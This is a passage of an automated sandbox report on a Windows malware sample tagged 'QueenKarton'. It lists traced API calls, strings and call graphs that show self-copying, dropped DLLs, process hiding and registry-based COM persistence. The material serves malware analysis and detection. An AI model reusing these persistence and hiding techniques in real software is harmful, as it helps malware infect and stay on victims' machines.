GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 40138a RegSetValueExA RegCloseKey 2704->2705 2706 401386 2704->2706 2705->2706 2706->2696

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Ojacofgb,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Ojacofgb,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Ojacofgb,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Ojacofgb,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Ojacofgb$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-3032070440
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
